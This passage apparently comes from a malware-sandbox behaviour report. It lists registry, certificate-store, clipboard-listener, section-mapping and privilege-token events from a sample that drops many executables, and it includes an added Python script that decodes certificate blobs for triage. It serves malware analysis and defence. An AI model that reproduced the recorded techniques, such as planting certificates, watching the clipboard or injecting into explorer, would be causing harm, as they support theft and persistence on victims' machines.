| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{F92F7005-C230-498E-AF8D-A0635DC93F99} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{8384D9A8-37EB-49D2-8A0E-90232ADDEEEF} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = ... | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = ... | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = ... | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = ... | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81 | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = ... | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = ... | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = ... | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = ... | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
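The Blob values in the rows above are CryptoAPI serialized certificate properties: a run of records of the form DWORD property ID, DWORD reserved (always 1), DWORD length, then the data, all little-endian. In the TrustedPublisher blob that is printed in full, the first record is property 3 (CERT_SHA1_HASH_PROP_ID) and carries CBC64D0F...9B61CA, the same value as the registry key name, and the second is property 0x20 (CERT_CERT_PROP_ID) holding a 1548-byte DER certificate whose subject reads "OpenVPN Technologies, Inc.", issued by "DigiCert EV Code Signing CA (SHA2)" and valid from 160209000000Z to 190213120000Z. A code-signing certificate landing in TrustedPublisher suppresses the publisher prompt for that signer's drivers and installers, which fits a bundled VPN/TAP driver setup (MaskVPN components appear elsewhere in this report) rather than a custom root. The AuthRoot rows are a different case: CryptoAPI caches public roots there when a chain is built (0563B863...B24D43 matches the published DigiCert Assured ID Root CA fingerprint), so AuthRoot writes by an installer are usually root-update caching, while TrustedPublisher and the per-user CA store deserve the closer look.

The following added example, which is not part of the sandbox report, decodes that record layout, cross-checks the three places the thumbprint must agree (key name, SHA-1 property, hash of the embedded certificate) and reports a blob whose declared certificate length overruns the data. Its first input is the opening 57 bytes of the TrustedPublisher blob above, so the certificate record is deliberately incomplete; the second is a constructed placeholder "certificate" that is not a real X.509 object. The property-ID names are assumed from wincrypt.h.

```python
"""Decode a SystemCertificates\\<store>\\Certificates\\<thumbprint>\\Blob value.

Added example for triaging "Modifies system certificate store" rows; not
tooling from the sandbox vendor. Assumed record layout (CryptoAPI serialized
certificate properties):
    DWORD propid | DWORD reserved (1) | DWORD length | BYTE data[length]
"""
import hashlib
import struct

# Property IDs that matter for triage (values assumed from wincrypt.h).
PROP_NAMES = {
    2: "CERT_KEY_PROV_INFO_PROP_ID",   # private key lives on this box
    3: "CERT_SHA1_HASH_PROP_ID",       # thumbprint, mirrored in the key name
    4: "CERT_MD5_HASH_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",  # UTF-16LE, NUL terminated
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    32: "CERT_CERT_PROP_ID",           # the DER-encoded certificate itself
}
CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32


def parse_cert_blob(blob: bytes) -> dict:
    """Return {propid: data}. If a record's declared length overruns the
    buffer, stop and record (propid, declared, present) under 'truncated'."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        propid, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        data = blob[off:off + length]
        if len(data) < length:
            props["truncated"] = (propid, length, len(data))
            break
        props[propid] = data
        off += length
    return props


def verify_blob(key_thumbprint: str, blob: bytes) -> dict:
    """Cross-check key name vs. SHA-1 property vs. hash of the embedded cert."""
    props = parse_cert_blob(blob)
    result = {
        "props": sorted(PROP_NAMES.get(p, f"prop_{p}") for p in props if isinstance(p, int)),
        "truncated": props.get("truncated"),
        "key_matches_sha1_prop": None,
        "cert_matches_sha1_prop": None,
    }
    sha1_prop = props.get(CERT_SHA1_HASH_PROP_ID)
    if sha1_prop is not None:
        result["key_matches_sha1_prop"] = sha1_prop.hex().lower() == key_thumbprint.lower()
    cert = props.get(CERT_CERT_PROP_ID)
    if cert is not None and sha1_prop is not None:
        result["cert_matches_sha1_prop"] = hashlib.sha1(cert).digest() == sha1_prop
    return result


def build_cert_blob(cert_der: bytes, friendly_name: str = "") -> bytes:
    """Serialize a blob the way CryptoAPI lays it out (constructed, for testing)."""
    def rec(propid: int, data: bytes) -> bytes:
        return struct.pack("<III", propid, 1, len(data)) + data
    out = rec(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(cert_der).digest())
    if friendly_name:
        out += rec(11, friendly_name.encode("utf-16-le") + b"\x00\x00")
    return out + rec(CERT_CERT_PROP_ID, cert_der)


# First 57 bytes of the TrustedPublisher blob in the report above; the rest of
# the 0x60c-byte certificate record is omitted, so it parses as truncated.
REPORT_BLOB_PREFIX = bytes.fromhex(
    "030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca"
    "20000000010000000c06000030820608308204f0a003020102"
)
REPORT_KEY = "CBC64D0FC770B1694DF723BB18B5679CE09B61CA"

# Constructed stand-in for a DER certificate; not a real X.509 object.
FAKE_CERT_DER = b"\x30\x05\x02\x01\x01\x05\x00"
FAKE_CERT_THUMBPRINT = hashlib.sha1(FAKE_CERT_DER).hexdigest()

if __name__ == "__main__":
    print(verify_blob(REPORT_KEY, REPORT_BLOB_PREFIX))
    print(verify_blob(FAKE_CERT_THUMBPRINT, build_cert_blob(FAKE_CERT_DER, "test")))
```

Against a live system the same function runs over the bytes read from the Blob value; a mismatch between the key name and the SHA-1 property, or between the property and the actual certificate hash, means the entry was written by something other than CryptoAPI and is worth pulling.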
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (3).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (3).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2602399.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6541000.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7795918.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
